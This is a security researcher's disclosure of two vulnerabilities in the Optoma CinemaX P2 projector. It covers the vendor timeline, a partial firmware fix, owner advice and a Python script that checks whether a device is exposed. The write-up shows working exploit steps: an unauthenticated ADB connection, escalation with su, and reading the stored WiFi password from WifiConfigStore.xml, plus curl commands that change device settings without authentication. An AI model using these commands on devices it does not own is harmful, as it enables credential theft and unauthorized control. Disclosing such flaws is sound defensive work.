CVE IDs: CVE-2026-30495, CVE-2026-30496
Vendor: Optoma / Coretronic Corporation
Disclosure Date: 2026-02-01
Public Disclosure: 2026-05-02


TL;DR

I'd owned my Optoma CinemaX P2 projector for nearly four years when I decided 2026 would be the year I started looking at IoT devices. It took a matter of minutes to find that ADB was wide open on the network, and a few minutes more to get a root shell on it and extract my own WiFi password. Anyone on my network can do the same — no authentication required.

The projector was released in September 2020 but runs Android 8 with a security patch level from December 2017, already nearly three years out of date when it shipped. The last firmware update was July 2021 and addressed HDMI issues, not security. It ships with ADB wide open on the network and a working su binary.

I retested on 2026-02-08 after manually applying the latest available firmware (C13.2) and performing a factory reset — both vulnerabilities persisted. In March 2026, Optoma issued a new firmware that addresses the ADB issue (CVE-2026-30495), but leaves the unauthenticated control API (CVE-2026-30496) exploitable. That update is not pushed through the on-device updater, the version string is unchanged, and the release notes don't mention security — so most owners will never receive it.

Affected Products

I tested on a CinemaX P2, but based on shared firmware, these models are likely affected too:

Model                     Status
CinemaX P2 (X1VDPTHG)     Confirmed vulnerable
CinemaX P1 / UHZ65UST     Likely vulnerable (same device, regional naming)
CinemaX Pro               Likely vulnerable (same firmware platform)

Affected Versions

All affected products report firmware version TVOS-04.24.010.04.01 with ro.build.display.id = P1_Lite-userdebug 8.0.0 OPR5.170623.014 TVOS-04.24.010.04.01 test-keys. Optoma did not change this string across the security rebuild, so the only reliable per-build identifier is the Android ro.build.date property:

Firmware build (ro.build.date)   Release                                                                           CVE-2026-30495 (root ADB)
Thu Jun 3 01:12:35 CST 2021      Distributed by Optoma as "C13.2", July 2021                                       Vulnerable (ro.adb.secure=0)
Wed Mar 4 17:57:00 CST 2026      Published on the Optoma EMEA download page on 2026-03-23, still labelled "C13.2"  Fixed (ro.adb.secure=1)

CVE-2026-30496 (control API) is unfixed at this time.

Confirmed vulnerable, directly tested: CinemaX P2 (model X1VDPTHG).


The Vulnerabilities

CVE-2026-30495: Unauthenticated Remote Root Access (CVSS 9.6 Critical)

The projector exposes ADB (Android Debug Bridge) on TCP port 5555 with no authentication required. From there you can trivially su to root. Here is the Wi-Fi password, stored in cleartext in Android's WifiConfigStore.xml:

$ adb connect 192.168.1.73
connected to 192.168.1.73:5555
$ adb shell
P1_Lite:/ $ su
P1_Lite:/ # cat /data/misc/wifi/WifiConfigStore.xml | grep PreSharedKey
<string name="PreSharedKey">&quot;REDACTED&quot;</string>

That's it. No authentication, no prompts, no warnings. Anyone on your network can do this.

Exposed ADB is an actively exploited vector for IoT botnets: see Krebs's article on the Kimwolf botnet, "The Kimwolf botnet is stalking your local network" (January 2026), which targets exactly this kind of misconfiguration.

CVE-2026-30496: Unauthenticated Remote Control API (CVSS 6.3 Medium)

This isn't as severe as the first one, but there's an HTTP API on port 2345 that allows full remote control - not just reading settings, but changing them:

# Read volume
$ curl http://192.168.1.30:2345/get/Volume
93

# Change volume (no auth required)
$ curl http://192.168.1.30:2345/inc/Volume
94

# Set arbitrary value
$ curl -X PUT "http://192.168.1.30:2345/set/Volume?value=50"
0

# Mute the device
$ curl -X PUT "http://192.168.1.30:2345/set/Mute?value=1"
0

Anyone on your network can change your projector's settings, and could possibly damage the device by hammering the API with repeated changes.


How I Found This

I'd had the projector since March 2022. In January 2026 I decided to start poking at the IoT devices in my house. This was literally the first thing I tried on the first device (start with the most expensive Android device, where else?), and I noticed port 5555 (ADB) and port 2345 (HTTP) open on the projector. Neither should be accessible on a network without authentication.

Vendor Response

I reported both issues to Optoma on 2026-02-01:

Optoma US acknowledged the same day; Optoma EMEA acknowledged on 2026-02-04 and confirmed they had escalated the report to the relevant team. Optoma US never contacted me again, nor responded to my follow-ups after the initial acknowledgement. EMEA did get back to me.

On 2026-03-23, Optoma EMEA notified me that a new firmware build was available addressing the ADB issue. Static analysis of the unflashed image confirms that the relevant Android system properties are flipped (old value → new value):

  • ro.adb.secure: 0 → 1
  • ro.debuggable: 1 → 0
  • persist.sys.usb.config: adb → none

This addresses CVE-2026-30495. CVE-2026-30496 — the unauthenticated HTTP control API on port 2345 — is not mentioned in the release notes and is not addressed by the firmware image.

There are several problems with how the patch is being delivered:

  • The new firmware is labelled C13.2, the same version string as the known-vulnerable build it replaces. There is no way for an owner to tell from the version number whether they have the patched build.
  • The release notes do not mention either security issue.
  • The firmware is not offered through the on-device update mechanism. I have checked many times over the years and have never been offered an update; this one is not offered either. Possibly a side effect of the unchanged version string.
  • The updated firmware is published on the Optoma Europe download page but not on the Optoma USA download page as of disclosure. The projector was sold in both regions.

The combination — silent release notes, no automatic update, partial geographic coverage, no version bump — means uptake will be very low. And even owners who manually apply the patch are still exposed via the unauthenticated control API.

What You Should Do

If you own one of these projectors:

Realistically, treat this device as compromised if it has ever sat on a network where port 5555 was reachable from the internet, or alongside other devices that may themselves have been compromised.

  1. Disconnect it from the network entirely if you don't need it online - if you only feed it video over HDMI from an Apple TV, set-top box, or laptop, the projector has no reason to be on WiFi or Ethernet at all. This is the only step that fully closes both vulnerabilities.
  2. Manually apply the March 2026 firmware from the Optoma Europe download page (or the UHZ65UST equivalent). It is not offered through the on-device updater, and at the time of writing it is not yet on the Optoma USA download page. The version string is unchanged, so confirm the build by its ro.build.date (Wed Mar 4 17:57:00 CST 2026) or the download's file date rather than the in-projector version number. This closes the ADB vector but not the unauthenticated control API.
  3. Isolate it - Put it on a separate VLAN or guest network. The unauthenticated control API on port 2345 is not addressed by any current firmware.
  4. Don't use it on shared networks - Hotels, offices, anywhere you don't control the network.
  5. Disable network features - If you don't need Alexa integration or remote control apps, don't use them.
  6. Block outbound traffic - At your firewall if possible.
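A way to check where your projector stands without relying on the unchanged version string, as an added example (not Optoma's code nor the original post's): it sends an ADB CNXN to port 5555 and reads the daemon's first reply, checks whether /get/Volume on port 2345 answers without authentication, and identifies a firmware build from `adb shell getprop` output by ro.build.date, exactly as the Affected Versions table does. Two assumptions are mine and not stated on the page: that the projector's adbd follows the standard ADB wire protocol (answering CNXN with CNXN when ro.adb.secure=0 and with an AUTH challenge when ro.adb.secure=1), and that the control API returns a bare integer for /get/Volume as in the curl transcript above. The getprop sample embedded in the script is constructed for illustration.

```python
import http.client
import re
import socket
import struct

# ADB wire-protocol constants (public ADB protocol, not Optoma-specific).
A_CNXN = 0x4E584E43            # "CNXN": connection request / connection accepted
A_AUTH = 0x48545541            # "AUTH": daemon demands an RSA-signed token first
ADB_VERSION = 0x01000000
ADB_MAXDATA = 256 * 1024
HEADER = struct.Struct("<IIIIII")  # command, arg0, arg1, data_len, data_check, magic

# Builds from the Affected Versions table above, keyed by ro.build.date.
KNOWN_BUILDS = {
    "Thu Jun 3 01:12:35 CST 2021": "vulnerable (original C13.2, July 2021)",
    "Wed Mar 4 17:57:00 CST 2026": "ADB fixed (C13.2 rebuild, March 2026); control API still open",
}

# Constructed sample of `adb shell getprop` output, in the real getprop format.
SAMPLE_GETPROP = """[ro.adb.secure]: [0]
[ro.build.date]: [Thu Jun 3 01:12:35 CST 2021]
[ro.build.display.id]: [P1_Lite-userdebug 8.0.0 OPR5.170623.014 TVOS-04.24.010.04.01 test-keys]
"""


def adb_packet(cmd: int, arg0: int, arg1: int, data: bytes = b"") -> bytes:
    """Serialise one ADB message: 24-byte header followed by the payload."""
    check = sum(data) & 0xFFFFFFFF          # byte sum, as the classic protocol specifies
    return HEADER.pack(cmd, arg0, arg1, len(data), check, cmd ^ 0xFFFFFFFF) + data


def cnxn_packet() -> bytes:
    """The CNXN message a host sends to open an ADB session."""
    return adb_packet(A_CNXN, ADB_VERSION, ADB_MAXDATA, b"host::\x00")


def classify_adb_reply(reply: bytes) -> str:
    """Map adbd's first message to 'open', 'auth-required' or 'unknown'."""
    if len(reply) < HEADER.size:
        return "unknown"
    cmd, _a0, _a1, _n, _check, magic = HEADER.unpack_from(reply)
    if magic != cmd ^ 0xFFFFFFFF:
        return "unknown"                   # not an ADB header at all (e.g. some other service)
    if cmd == A_CNXN:
        return "open"                      # handshake completed with no auth: ro.adb.secure=0
    if cmd == A_AUTH:
        return "auth-required"             # daemon wants a signed token: ro.adb.secure=1
    return "unknown"


def classify_build(getprop_output: str) -> dict:
    """Identify the firmware build from getprop text by ro.build.date, since
    ro.build.display.id is identical across the vulnerable and fixed builds."""
    props = dict(re.findall(r"^\[(.+?)\]: \[(.*)\]$", getprop_output, re.M))
    date = props.get("ro.build.date", "")
    return {
        "build_date": date,
        "adb_secure": props.get("ro.adb.secure"),
        "status": KNOWN_BUILDS.get(date, "unknown build; inspect ro.adb.secure directly"),
    }


def probe_adb(host: str, port: int = 5555, timeout: float = 3.0) -> str:
    """Send a CNXN to host:port and classify the reply; 'closed' if nothing answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(cnxn_packet())
            return classify_adb_reply(s.recv(HEADER.size + ADB_MAXDATA))
    except OSError:                        # refused, unreachable, or timed out
        return "closed"


def probe_control_api(host: str, port: int = 2345, timeout: float = 3.0) -> str:
    """GET /get/Volume; a bare integer body means the unauthenticated API is reachable."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/get/Volume")
        body = conn.getresponse().read().decode(errors="replace").strip()
        return "exposed" if body.isdigit() else "unexpected reply: " + body[:40]
    except OSError:
        return "closed"


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.73"  # address from the transcript above
    print("ADB (5555):", probe_adb(target))
    print("Control API (2345):", probe_control_api(target))
    print("Sample getprop classification:", classify_build(SAMPLE_GETPROP))
```

Run it as `python3 check_projector.py 192.168.1.73` from a machine on the same network. "open" on port 5555 means the original C13.2 build (or any build with ro.adb.secure=0); "auth-required" means adbd is at least asking for a key, which is what the March 2026 rebuild should produce; "exposed" on port 2345 will show up on both builds, since no current firmware addresses CVE-2026-30496. If you have shell access, pipe `adb shell getprop` into `classify_build` to match the build date against the table rather than trusting the C13.2 label.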

Timeline

Date             Event
September 2020   CinemaX P2 released (shipped with December 2017 security patches, already nearly three years out of date)
July 2021        Last firmware update before this incident (HDMI/lip-sync fixes only, no security updates)
March 2022       I purchased the projector new at retail
December 2022    CinemaX P2 discontinued from retail sale
January 2026     Discovered ADB open, root access confirmed, started assessment
2026-02-01       Notified Optoma EMEA via UK PSTI form (Ticket #11594) and Optoma US (Ticket #2033016); CVEs requested from MITRE
2026-02-02       Optoma US acknowledged
2026-02-04       Optoma EMEA acknowledged, escalated to engineering
2026-02-08       Retested on latest available firmware (C13.2) after factory reset; both vulnerabilities persist
2026-03-23       Optoma EMEA released a new firmware build addressing the ADB issue
2026-03-30       Static analysis of the new firmware confirmed CVE-2026-30495 is mitigated; CVE-2026-30496 is not addressed; rollout deficiencies identified
2026-05-02       Public disclosure

Technical Details

Full evidence available, on request:

  • ADB session logs showing root escalation
  • API testing logs showing unauthenticated control
  • Network packet captures
  • Several other, less severe vulnerabilities I haven't had a chance to report yet

Questions? stefan@whitelabel.org